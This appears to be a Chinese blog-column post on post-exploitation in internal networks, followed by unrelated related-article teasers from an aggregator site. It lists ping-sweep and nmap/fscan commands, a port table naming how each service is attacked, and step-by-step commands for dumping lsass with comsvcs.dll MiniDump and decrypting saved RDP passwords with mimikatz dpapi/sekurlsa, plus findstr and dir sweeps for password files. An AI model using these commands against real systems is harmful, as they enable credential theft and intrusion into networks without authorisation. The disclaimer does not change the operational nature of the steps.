2.2_内网IP端口密码抓取

  • 内网IP扫描


ICMP
命令
Windows
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.7.%I | findstr "TTL= #windows"
Linux
for k in $( seq 1 255);do ping -c 1 192.168.99.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
工具
Nmap(推荐)sudo nmap -sn -PR 192.168.142.0/24
Fscan (推荐)主机发现+端口web服务检测+基础漏洞扫描
Kscan主机发现+端口扫描+协议检测+指纹识别
Fpingnbtscan,...其他工具内网扫描工具

ARP

(推荐)

命令Windows/Linux:arp -a
工具CS的端口扫描

NTBIOS

命令Linux:nbtscan -r 目标IP范围

nbtscan -r 192.168.1.1-254
工具CS的端口扫描

  • 内网端口扫描


  1. 扫描

    命令kalitelnet 快速检测单个端口有没有开放,例:telnet 192.168.142.128 80
    工具
    Nmap (推荐)nmap -sV -p- 192.168.110.151
    Fscan (推荐)端口web服务检测+基础漏洞扫描
    Kscan主机发现+端口扫描+协议检测+指纹识别
  2. 常见端口及描述

    端口号端口服务利用方式
    21,22,69FTP文件传输协议允许匿名的上传,下载,爆破和嗅探操作
    22SSH远程连接爆破,SSH隧道及内网代理转发,文件传输
    23Telnet 远程连接爆破,嗅探,弱口令
    25SMTP 邮件服务邮件伪造
    53DNS 域名系统允许区域传送,DNS劫持,缓存投毒,欺骗
    67,68DHCP 服务劫持,欺骗
    80,443,8080常见的 Web 服务端口Web 攻击,爆破,对应服务器版本漏洞
    110POP3协议爆破,嗅探
    139NTBIOS 服务爆破,未授权访问,远程代码执行
    512,513,514Linux rexec 服务畴爆破,远程登录
    873rsync 服务匿名访问,文件上传
    1352Lotus Domino 邮件服务弱口令,信息泄露,爆破
    1433MSSQL 数据库注入,提权,爆破
    1521Oracle 数据库注入,反弹shell
    2049NFS 服务配置不当
    2181ZooKeeper 服务未授权访问
    2375Docker 服务未授权访问
    3306MySQL 数据库注入,提权,爆破
    3389Telnet 远程连接爆破,嗅探,弱口令
    3690SVN 服务SVN 泄露,未授权访问
    4848GlassFish 控制台弱口令
    5432Post greSQL 数据库爆破,注入,弱口令
    5900,5901VNC弱口令爆破,未授权访问
    5984CouchDB未授权访问
    6379redis未授权访问
    7001WeblogicWeblogic 漏洞
    8069Zabbix 服务远程执行,SQL注入
    8080,8090JBoss/Resin/Jetty/Jenkins反序列化,控制台弱口令
    9090WebSphere 控制台Java 反序列化,弱口令
    9200,9300EI asticsearcb 服务远程执行
    10000webmin 控制面板弱口令
    11211Memcached 服务未授权访问
    27017,27018MongoDB 数据库爆破,未授权访问
    50000SAP Management Console远程执行

  • RDP 明文密码读取 


当用户点击了记住我的凭据,我们可以对保存的密码进行还原

查看凭据
  1. 被连接主机 查看mstsc的连接记录:cmdkey /list
  2. 查找本地的凭据文件:dir /a %userprofile%\appdata\local\microsoft\credentials\*
  3. 得到其凭据文件路径(绝对路径和文件名进行拼接)(记录)(记得更改用户名)C:\Users\admin\appdata\local\microsoft\credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
在线读取
  1. 目标主机 查看其 guidMasterKeymimikatz dpapi::cred /in:凭据文件路径
  2. 将凭据载入到内存 :mimikatz sekurlsa::minidump lsass.dmp
  3. 获取其 GUID:dpapi::cred /in:凭据文件路径
  4. 找到内存中对应的MasterKey(记录): sekurlsa::dpapi
  5. 解密凭证文件:dpapi::cred /in:凭据文件路径 /masterkey:masterkey值
  6. CredentialBlob 出显示密码
离线读取
  1. 查看lsass.exe进程PID: tasklist | findstr lsass.exe
  2. 使用powershell 导出 lsass (需管理员权限)
    1. powershell rundll32 C:\windows\system32\comsvcs.dll, MiniDump "lsass.exe的PID" C:\Users\lenovo\Desktop\lsass.dmp full
    2. win10 使用 导出 lsass (需管理员权限)powershell -c 'rundll32 C:\windows\system32\comsvcs.dll, MiniDump "lsass.exe的PID" C:\lsass.dmp full'
    3. lsass.dmp 下载到本地
  3. ↑ 下载其凭证操作 ↑
  4. (若其隐藏:查看 -> 选项 -> 查看 ->  取消勾选 隐藏受保护的操作系统文件(推荐) )
  5. 将凭据载入到内存 :mimikatz sekurlsa::minidump lsass.dmp
  6. 获取其 GUIDMasterKey:dpapi::cred /in:凭据文件路径
  7. 找到内存中对应的MasterKey(记录): sekurlsa::dpapi 
  8. 解密凭证文件:dpapi::cred /in:凭据文件路径 /masterkey:masterkey值
  9. CredentialBlob 出显示密码

  • 软件密码抓取工具


类型工具
浏览器密码Sharp-HackBrowserData
FinallshellFinalShell-Decoder

  • 其他信息收集命令


# 指定目录下搜集各类敏感文件
dir /a /s /b d:\"*.txt" 
dir /a /s /b d:\"*.xml" 
dir /a /s /b d:\"*.mdb" 
dir /a /s /b d:\"*.sql" 
dir /a /s /b d:\"*.mdf" 
dir /a /s /b d:\"*.eml" 
dir /a /s /b d:\"*.pst" 
dir /a /s /b d:\"*conf*" 
dir /a /s /b d:\"*bak*" 
dir /a /s /b d:\"*pwd*" 
dir /a /s /b d:\"*pass*" 
dir /a /s /b d:\"*login*" 
dir /a# 指定目录下的文件中搜集各种账号密码
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

  • 免责声明


  1. 本专栏内容仅供参考,不构成任何投资、学习或专业建议。读者在参考本专栏内容时,应结合自身实际情况,谨慎作出决策。

  2. 本专栏作者及发布平台尽力确保内容的准确性和可靠性,但无法保证内容的绝对正确。对于因使用本专栏内容而导致的任何损失,作者及发布平台概不负责。

  3. 本专栏部分内容来源于网络,版权归原作者所有。如有侵权,请及时联系我们,我们将尽快予以处理。

  4. 读者在阅读本专栏内容时,应遵守相关法律法规,不得将内容用于非法用途。如因读者行为导致不良后果,作者及发布平台不承担任何责任。

  5. 本免责声明适用于本专栏所有内容,包括文字、图片、音频、视频等。读者在阅读本专栏内容时,视为已接受本免责声明。

  6. 作者及发布平台保留对本免责声明的解释权和修改权,如有变更,将第一时间在本专栏页面进行公告。读者继续使用本专栏内容,视为已同意变更后的免责声明。

敬请广大读者谅解。如有疑问,请联系我们。谢谢!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/13684.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

六通道CAN集线器

六通道CAN集线器 --SG-CanHub-600 功能概述 SG_CanHub_600是一款具有六路通道的工业级智能 CAN数字隔离中继集线器。 SG_CanHub_600能够实现信号再生、延长通信距离、提高总线负载能力、匹配不同速 率 CAN网络,同时强大的 ID过滤功能可以极大降低 CAN总线负荷&a…

5分钟教你利用kimi+美图免费制作高质量、高点击动物冒险动画短片(含完整的操作步骤)

昨天十一点的时候,收到美图创作者通过了。与可灵、即梦等其他AI视频工具不同的是,MOKI专注于AI短片创作这一场景,覆盖动画短片、网文短剧、故事绘本、MV等多个类型的视频内容生产,结合行业需求,有针对性地打造了一套AI短片创作工作…

RocketMQ-01 消费模型和部署模型简介

消息队列的主要作用是对系统进行异步、削峰、解耦等,在日常开发中使用非常广泛。基于市面上几款消息队列,常见有:rabbitmq, activemq, rocketmq, kafka, Pulsar等,各有侧重,技术选型需根据自身系统业务定型。但基于国内…

贪心算法day03(最长递增序列问题)

目录 1.最长递增三元子序列 2.最长连续递增序列 1.最长递增三元子序列 题目链接:. - 力扣(LeetCode) 思路:我们只需要设置两个数进行比较就好。设a为nums[0],b 为一个无穷大的数,只要有比a小的数字就赋值…

基于JDBC的书库系统(MySQL)

一、创建数据库中的表 1、需求 有一张表叫javabook【创建表要求使用sql语句进行】 表中列 bookid 整数自增类型 表中列 bprice 小数类型 表中列 bookname 字符串类型 长度不能小于50 工程和包要求: domain dao …

2024 微信支付公钥 JAVA完整代码参考

需要用到的链接: 微信支付公钥使用介绍 - 平台证书 | 微信支付商户文档中心 GitHub - wechatpay-apiv3/wechatpay-java: 微信支付 APIv3 的官方 Java Library 谨记 如果有疑问 多看几遍 wechatpay-java的readme 和 example 创建预支付 Overridepublic ResultBean&…

CondaError: Run ‘conda init‘ before ‘conda activate‘解决办法

已经执行了conda init,但是还是会报错CondaError: Run ‘conda init’ before ‘conda activate’ 原因:权限不够 解决办法:以管理员身份运行cmd,然后进入要操作的文件夹下,重新执行 conda init 和 conda activate 就可…

边缘计算与推理算力:智能时代的加速引擎

在数据量爆炸性增长的今天,边缘计算与推理算力正成为推动智能应用的关键力量。智能家居、自动驾驶、工业4.0等领域正在逐步从传统的云端计算转向边缘计算,而推理算力的加入,为边缘计算提供了更强的数据处理能力和实时决策能力。本文将探讨边缘…

【Python TensorFlow】进阶指南(续篇二)

在前面的文章中,我们详细探讨了TensorFlow在实际应用中的高级功能和技术细节。本篇将继续深入探讨一些前沿话题,包括但不限于分布式训练、混合精度训练、神经架构搜索(NAS)、模型微调以及在实际项目中的最佳实践等,帮助…

JAVA后端生成图片滑块验证码 springboot+js完整案例

前言 现在大部分网部都是图片滑块验证码,这个得要与后端联动起来才是确保接口安全性 通过我们系统在发送手机短息时都会选进行滑块验证,但是我们要保证发送短息接口的全安,具体路思如下 那么这个滑块的必须是与后端交互才能保证安全性&…

机器学习—高级优化方法

梯度下降是机器学习中广泛应用的优化算法,像线性回归和逻辑回归以及神经网络的早期实现,现在有一些其他的优化算法,为了最小化成本函数,甚至比梯度下降的效果更好,这种算法可以用来帮助训练神经网络,比梯度…

【Vue3】知识汇总,附详细定义和源码详解,后续出微信小程序项目(3)

快速跳转: 我的个人博客主页👉:Reuuse博客 新开专栏👉:Vue3专栏 参考文献👉:uniapp官网 免费图标👉:阿里巴巴矢量图标库 ❀ 感谢支持!☀ 前情提要 &#x…

模型减肥秘籍:模型压缩技术 CNN基础

这里是Datawhale的组队学习活动,主要介绍的是模型压缩技术。后续将以CNN网络为基础点,带领大家领略模型压缩的魅力。首先是回顾一下一些关于CNN的基础知识。 参考链接: 模型减肥秘籍:模型压缩技术-课程详情 | Datawhale datawh…

Ollama的安装以及大模型下载教程

简介 Ollama是一个开源的大型语言模型服务工具,它帮助用户快速在本地运行大模型。通过简单的安装指令,用户可以执行一条命令就在本地运行开源大型语言模型, Ollama极大地简化了在Docker容器内部署和管理LLM的过程,使得用户能够快…

Mysql前言

文章目录 Mysql 数据库简介SQL 基础语法什么是 SQL语句SQL 的作用SQL 语句的分类SQL 通用语法查询状态 🏡作者主页:点击! 🤖Mysql专栏:点击! ⏰️创作时间:2024年11月12日18点20分 SQL是数据库…

Spring Boot编程训练系统:设计与实现要点

5系统详细实现 5.1 管理员模块的实现 5.1.1 用户信息管理 管理员对用户信息修改删除以及查询操作。具体界面的展示如图5.1所示。 图5.1 用户信息管理界面 5.1.2 题库资源管理 系统管理员可以对题库资源信息进行添加,修改,删除以及查询操作。具体界面如…

Xcode 16 使用 pod 命令报错解决方案

原文请点击这个跳转 一、问题现象: 有人会遇到 Xcode 升级到 16 后,新建应用然后使用 pod init 命令会报错如下: Stack Ruby : ruby 3.3.5 (2024-09-03 revision ef084cc8f4) [x86_64-darwin23]RubyGems : 3.5.22Host : macOS 15.0 (24A335…

hive中windows子句的使用

概述 1,windows子句是对窗口的结果做更细粒度的划分 2、windows子句中有两种方式 rows :按照相邻的几行进行开窗 range:按照某个值的范围进行开窗 使用方式 (rows | range) between (UNBOUNDED | [num]) PRECEDING AND ([num] PRECEDING…

Unet++改进24:添加DualConv||轻量级深度神经网络的双卷积核

本文内容:添加DualConv 目录 论文简介 1.步骤一 2.步骤二 3.步骤三 4.步骤四 论文简介 卷积神经网络(CNN)架构通常对内存和计算要求很高,这使得它们在硬件资源有限的嵌入式系统中不可行。 我们提出了双卷积核(DualConv)来构建轻量级深度神经网络。DualConv结合3 3和1…

【Vue3】知识汇总,附详细定义和源码详解,后续出微信小程序项目(4)

快速跳转: 我的个人博客主页👉:Reuuse博客 新开专栏👉:Vue3专栏 参考文献👉:uniapp官网 免费图标👉:阿里巴巴矢量图标库 ❀ 感谢支持!☀ 前情提要 &#x…